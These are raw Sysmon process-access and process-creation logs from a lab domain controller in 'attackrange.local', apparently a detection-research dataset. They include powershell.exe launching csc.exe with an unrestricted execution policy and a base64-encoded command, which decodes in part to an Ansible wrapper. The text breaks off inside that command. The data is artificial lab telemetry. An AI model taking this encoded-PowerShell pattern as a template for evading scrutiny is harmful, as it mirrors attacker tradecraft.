13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-CF02-000000009001}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-8519-5FCF-CE02-000000009001}26723536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8519-5FCF-CF02-000000009001}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.295{10ACEC4A-8519-5FCF-CF02-000000009001}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESAD5E.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCBBE554C03B134C258C85DB34ABC2B65A.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8519-5FCF-CE02-000000009001}2672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\pth4thaf.cmdline" 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.243{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.243{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.243{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8519-5FCF-CE02-000000009001}2672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-CE02-000000009001}2672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-8518-5FCF-CC02-000000009001}49044468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8519-5FCF-CE02-000000009001}2672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FFA6833CBBF) 154100x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.143{10ACEC4A-8519-5FCF-CE02-000000009001}2672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\pth4thaf.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AH